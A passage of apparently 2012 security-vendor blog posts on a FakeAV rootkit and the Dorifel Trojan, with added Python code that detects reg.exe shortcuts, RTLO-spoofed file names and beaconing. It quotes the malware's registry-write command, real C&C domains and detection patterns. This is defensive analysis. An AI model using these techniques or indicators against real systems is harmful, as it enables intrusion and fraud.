  • Target: C:\WINDOWS\system32\reg.exe add "HKCU\SOFTWARE\Microsoft\Windows NT" /v FrameworkBuild /t REG_DWORD /d 0 /f

When this registry value is accessed (when you click on the shortcut), the rootkit is triggered and opens the shopping cart:
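A shortcut that launches reg.exe is an unusual thing to find on a Desktop or Start Menu, so it is a useful hunting heuristic. The following is an added example (not code from this blog post or from HitmanPro) that classifies shortcut targets and flags the ones that write a registry value through reg.exe. The shortcut name/target pairs are constructed; on a live machine they would be read from the .lnk files, which is outside this example.

```python
"""Flag shortcuts whose target is reg.exe writing a registry value.

Added example, not code from the blog post. The shortcut name/target pairs
below are constructed; on a live machine they would come from the .lnk files
on the Desktop and Start Menu."""
import re

# reg.exe (quoted or not) followed by a write verb, then a quoted or bare key
REG_WRITE = re.compile(
    r'(?i)(?:^|[\\\s"])reg(?:\.exe)?"?\s+(?P<verb>add|delete)\s+'
    r'(?:"(?P<qkey>HK[^"]+)"|(?P<key>HK\S+))(?P<rest>.*)$'
)
# the /v switch names the value being written
VALUE_NAME = re.compile(r'(?i)(?:^|\s)/v\s+"?(?P<name>[^"\s]+)')


def classify_shortcut(name, target):
    """Return a finding dict when the target writes to the registry via reg.exe, else None."""
    m = REG_WRITE.search(target)
    if not m:
        return None
    value = VALUE_NAME.search(m.group("rest"))
    return {
        "shortcut": name,
        "verb": m.group("verb").lower(),
        "key": m.group("qkey") or m.group("key"),
        "value": value.group("name") if value else None,
    }


def scan_shortcuts(pairs):
    """Apply classify_shortcut to (name, target) pairs and keep the findings."""
    return [f for f in (classify_shortcut(n, t) for n, t in pairs) if f]


# constructed sample: the first entry is the shortcut target quoted in the post
SAMPLE_SHORTCUTS = [
    ("Buy Win 8 Security System",
     r'C:\WINDOWS\system32\reg.exe add "HKCU\SOFTWARE\Microsoft\Windows NT" /v FrameworkBuild /t REG_DWORD /d 0 /f'),
    ("Notepad", r"C:\Windows\System32\notepad.exe"),
    ("Registry Editor", r"C:\Windows\regedit.exe"),          # GUI editor, not a silent write
    ("Backup app settings", r"C:\Windows\System32\reg.exe export HKCU\Software\ExampleApp settings.reg"),
    ("Update check", r'"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Example /v Checked /t REG_DWORD /d 1 /f'),
]

if __name__ == "__main__":
    for hit in scan_shortcuts(SAMPLE_SHORTCUTS):
        print(f"{hit['shortcut']!r}: reg {hit['verb']} {hit['key']} /v {hit['value']}")
```

Only `add` and `delete` count as writes; `reg export` or regedit.exe shortcuts are left alone, which keeps the noise down when the rule is run over a whole profile.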

As you can see, for security software this FakeAV is pretty expensive. And if you pay, you have not only paid 100 bucks for fake software, you also submitted your credit card details to the cybercriminals.

Domains
When you look at the web traffic when the shopping cart opens, you can see some other interesting things:

The first site that is accessed is win8sec.com; the malware added this domain as a trusted domain to your computer upon installation. Next it communicates with the http://www.superantispyware.com domain, which belongs to a known legitimate anti-spyware program. If you compare the two websites you can see that win8sec.com is a partial copy of superantispyware.com:

When you look up the win8sec.com domain record you can discover that it was registered not too long ago, on August 18, 2012 (the registrant details are fake):

The win8sec.com domain currently points to IP address 31.184.244.59. This address currently resides in the United Arab Emirates.

Solution
At the time of this blog post, there is no anti-virus, anti-spyware or anti-malware tool that we know of that is capable of removing this malware completely. Some security forums therefore offer a comprehensive step-by-step tutorial, involving the use of multiple tools, to handle this infection. But many forget the rootkit component.

In the meantime, you can use HitmanPro (and the free license that comes with it) to thoroughly and conveniently remove the FakeAV program and its rootkit component. A screenshot of HitmanPro detecting this malware on a 64-bit computer:

Also, if you are affected by this malware, it is very likely that another malicious program was responsible for installing this FakeAV on your machine and is currently still hiding. You can also use HitmanPro to reveal and remove this hidden malware.


Joint Strike Force against Dorifel

August 11, 2012

Over the past three days the computer virus Dorifel became a very prominent news item as it went on a rampage, infecting as many computers as possible on both government and private networks. IT personnel were stressed out since there were next to no virus signatures to detect the malware.

The inconvenience felt by the general public grew fast as many towns' civil services, like the issuing of passports, had to be taken offline for damage control: Dorifel had encrypted most Excel and Word documents and converted them into executable files.

The result was that many government staff had to blow the dust off the old-fashioned typewriters again, as they were asked to leave their computers switched off in an attempt to stop the outbreak in its tracks.


Photo by Marcel van Hoorn (ANP)

The creativity of cybercriminals is endless and they do their utmost to stay hidden, bypass antivirus protection, slow down malware research and do something new. Knowing that most antivirus products will first focus on malware blocking only, we figured at the start of the outbreak that there would be no readily available solution soon to recover the millions of affected documents (which prolongs the exposure of sensitive data to the cybercriminals).

Teaming Up with Emsisoft
While we were investigating the outbreak, we also spoke with Fabian Wosar of Emsisoft, who was immediately keen to help. He recently created tooling to combat the ACCDFISA and Reveton ransomware families and conveniently had a few boilerplate functions lying around to speed up development of a dedicated remediation tool.

We immediately set up an extra examination environment in our office in Hengelo for Fabian to work on remotely with us, gathered malicious objects and affected documents, and started to analyze the malware's code and behaviors. The task was to find out how the seized documents were encrypted, whether there was a way to recover them and, if possible, create a special tool that people can use to recover their documents.

Working Around The Clock
After working from Wednesday evening into Thursday morning, August 9th, Fabian was ready to offer everybody a free-to-use decryption tool, which is available from our special support page: http://www.surfright.com/support/dorifel-decrypter

Here we would again like to thank Fabian Wosar for working with us on such short notice and helping everybody, especially the Dutch people, in limiting the effects of this attack.

To continue, we would like to share some interesting details that we encountered using the images below.


Image: Word, Excel and application files are automatically altered and renamed by the Dorifel malware. Notice the '?' (the character is not printable here), which is in fact Unicode character U+202E (aka RTLO, the right-to-left override character); it causes the infected file to show up in Windows as 'Contractrcs.doc', fooling users into thinking the file is still a document.


Image: The encrypted 'documents' contain movie phrases and references to TV shows.


Image: The +++scarface+++ marker indicating the start of the encrypted data, which represents the original document.
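The two captions above (the RTLO-renamed file and the +++scarface+++ marker) describe artefacts a defender can look for directly on a file share. The following is an added example, not code from this blog post or from the decrypter, that scans a folder for an RTLO character in a file name, for a document-looking name whose content is really a PE executable (MZ header), and for the marker that precedes the encrypted original. The sample files are constructed in a temporary directory; the bytes after the marker are random filler and do not reproduce Dorifel's real encryption format.

```python
"""Scan a folder for Dorifel-style artefacts: an RTLO in the file name, a
document-looking name on a PE executable, and the '+++scarface+++' marker.

Added example, not code from the blog post or the decrypter. The sample files
are constructed; the data after the marker is random filler, not Dorifel's
real encryption format."""
import os
import tempfile

# Unicode bidirectional override/embedding/isolate controls; U+202E is the RTLO from the caption
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}
SCARFACE_MARKER = b"+++scarface+++"
DOC_EXTENSIONS = {".doc", ".docx", ".xls", ".xlsx"}


def displayed_name(name):
    """Approximate how Explorer renders a name containing an RTLO: everything
    after the first U+202E is drawn right-to-left, i.e. reversed."""
    i = name.find("\u202e")
    if i < 0:
        return name
    return name[:i] + name[i + 1:][::-1]


def analyze_file(path):
    """Return the list of findings for one file (empty when nothing is suspicious)."""
    findings = []
    name = os.path.basename(path)
    if any(ch in BIDI_CONTROLS for ch in name):
        findings.append("bidi-override")
    real_ext = os.path.splitext(name)[1].lower()
    shown_ext = os.path.splitext(displayed_name(name))[1].lower()
    with open(path, "rb") as fh:
        data = fh.read()
    looks_like_document = real_ext in DOC_EXTENSIONS or shown_ext in DOC_EXTENSIONS
    if data[:2] == b"MZ" and looks_like_document:
        findings.append("pe-disguised-as-document")
    if SCARFACE_MARKER in data:
        findings.append("scarface-marker")
    return findings


def scan_directory(dirpath):
    """Map file name -> findings for every flagged file directly inside dirpath."""
    report = {}
    for entry in sorted(os.listdir(dirpath)):
        full = os.path.join(dirpath, entry)
        if os.path.isfile(full):
            findings = analyze_file(full)
            if findings:
                report[entry] = findings
    return report


def build_sample_dir():
    """Create constructed samples: a clean docx, an RTLO-spoofed .scr carrying
    the marker, and a plain executable renamed to .xls."""
    d = tempfile.mkdtemp(prefix="dorifel-demo-")
    samples = {
        "report.docx": b"PK\x03\x04" + b"\x00" * 32,                   # genuine Office (zip) header
        "Contract\u202ecod.scr": b"MZ" + b"\x90" * 64 + SCARFACE_MARKER + os.urandom(32),
        "budget.xls": b"MZ" + b"\x90" * 64,                             # executable behind a document name
    }
    for name, content in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(content)
    return d


if __name__ == "__main__":
    folder = build_sample_dir()
    for fname, hits in scan_directory(folder).items():
        print(f"shown as {displayed_name(fname)!r}, actually {fname!r}: {', '.join(hits)}")
```

The displayed-name check matters because the real extension of the spoofed file is .scr while the user sees .doc; comparing both against the MZ header catches the file regardless of which name an admin is looking at.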


Image: The pseudo code of the encryption/decryption loop.


Image: The assembly code of the encryption/decryption loop.


Image: Dorifel communicating on the network. Notice it queries for a local machine named KASPERSKY. More importantly, notice the internet traffic with the pin= parameter, where Dorifel tries to get an additional payload. Since it first tries to connect to Microsoft's Update Service (which is hardcoded in the malware), we think that the attackers were also planning to redirect Windows Update traffic. The domain reslove-dns.com is currently sinkholed.


Image: Dorifel connecting to the forum.4game.com website for Command & Control information.


Image: Every 1500 seconds Dorifel is retrieving a seemingly harmless ‘Breaking Bad’ season 5 poster (jpeg).
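The three captions above give a defender something concrete to look for in proxy logs: contact with the domains the post names, requests carrying a pin= parameter, and a client fetching the same URL at a fixed 1500-second interval. The following is an added example, not code from this blog post, that runs those checks over a constructed log extract. Only the two domain names come from the post; the CDN host, the paths and the client addresses are invented placeholders.

```python
"""Hunt for Dorifel-style network behaviour in a proxy log: known domains,
requests with a 'pin=' parameter, and fixed-interval fetches of one URL.

Added example, not code from the blog post. The log lines are constructed;
only the two domain names in KNOWN_DOMAINS come from the post."""
import re
import statistics
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

KNOWN_DOMAINS = {"reslove-dns.com", "forum.4game.com"}  # named in the post

# constructed log format: ISO-timestamp client method host path
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<host>\S+)\s+(?P<path>\S+)$")

SAMPLE_LOG = """\
2012-08-09T10:00:00 10.0.0.5 GET cdn.example.invalid /img/breaking_bad_s5.jpg
2012-08-09T10:00:03 10.0.0.5 GET reslove-dns.com /get.php?pin=123456
2012-08-09T10:00:05 10.0.0.5 GET forum.4game.com /index.php
2012-08-09T10:01:00 10.0.0.7 GET www.example.com /
2012-08-09T10:25:00 10.0.0.5 GET cdn.example.invalid /img/breaking_bad_s5.jpg
2012-08-09T10:31:00 10.0.0.7 GET www.example.com /
2012-08-09T10:50:00 10.0.0.5 GET cdn.example.invalid /img/breaking_bad_s5.jpg
2012-08-09T11:15:00 10.0.0.5 GET cdn.example.invalid /img/breaking_bad_s5.jpg
2012-08-09T12:00:00 10.0.0.7 GET www.example.com /
"""


def parse_log(text):
    """Turn log lines into dicts with a datetime in 'ts'; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.fromisoformat(rec["ts"])
        records.append(rec)
    return records


def known_domain_hits(records):
    """Requests to the domains named in the post."""
    return [r for r in records if r["host"].lower() in KNOWN_DOMAINS]


def pin_requests(records):
    """Requests whose query string carries a 'pin' parameter."""
    return [r for r in records if "pin" in parse_qs(urlsplit(r["path"]).query)]


def find_beacons(records, min_hits=3, tolerance=0.1):
    """Return [((client, host, path), median_gap_seconds), ...] for URL fetches
    whose inter-request gaps all lie within tolerance of the median gap."""
    times = defaultdict(list)
    for r in records:
        times[(r["client"], r["host"], r["path"])].append(r["ts"])
    beacons = []
    for key, stamps in times.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        median = statistics.median(gaps)
        if median > 0 and all(abs(g - median) <= tolerance * median for g in gaps):
            beacons.append((key, median))
    return beacons


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for r in known_domain_hits(recs):
        print("known domain:", r["client"], r["host"], r["path"])
    for r in pin_requests(recs):
        print("pin= request:", r["client"], r["host"], r["path"])
    for key, gap in find_beacons(recs):
        print(f"periodic fetch every {gap:.0f}s:", *key)
```

The interval check deliberately ignores what is being fetched: a seemingly harmless jpeg pulled every 1500 seconds by the same client is the signal, and the 10.0.0.7 browsing in the sample is left alone because its gaps are irregular.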


Image: The 'Breaking Bad' jpeg image contains hidden encoded Command & Control data. Dorifel stores it in a .dat file in its own folder under %appdata%, e.g. C:\Documents and Settings\User\Application Data\S4428M\G9D8Z3.exe.dat


Image: Small extract from our database where our HitmanPro software was used to rescue AV-protected computers that were infected by Dorifel. The table shows that many machines also had Zeus/Zbot/Citadel Trojans, for weeks! Note: user 4624107 had an expired license of our software, which is why the same malware was detected twice.


The Dorifel outbreak was only a symptom. But what is the real problem?

August 10, 2012

Earlier this week, government, public sector and private company networks were hit hard by a new wave of crypto malware named Trojan-Dropper.Win32.Dorifel. Computers were shut down and the old-fashioned typewriters that were gathering dust in the basement reappeared in the workplace. For a moment I even thought this was funny.

The Dorifel Trojan scans network shares, local drives and USB connected drives for executables and Microsoft Office (Word and Excel) documents. Documents and programs were replaced with a new executable file that has the .scr file extension. Currently, most affected users will not notice anything since the ‘documents’ open as usual. It looks like the malware is currently only interested in propagating itself to as many machines as possible. But it is not unlikely that the attackers will later start blocking the ‘documents’ and requesting a ransom fee for unblocking them.

This is bad news for the organizations that were hit. But what's even worse is that the Trojan entered the networks through a variant of the Zeus/Zbot banking Trojan called Citadel. This means that this Trojan was already present on one or more computers inside the network for days, maybe weeks. In other words: the malware could already be snooping on all electronic communication inside the organization, including stealing passwords of critical infrastructure, copying confidential documents, social security numbers, passport details, etc. without anyone (or anything) noticing (!)

Not being able to use your computer for a while, while system administrators are shutting computers down, cleaning them and bringing them back into the network, is very inconvenient. But it is even more worrisome that computers and networks have been infected for a much longer period without anyone noticing.
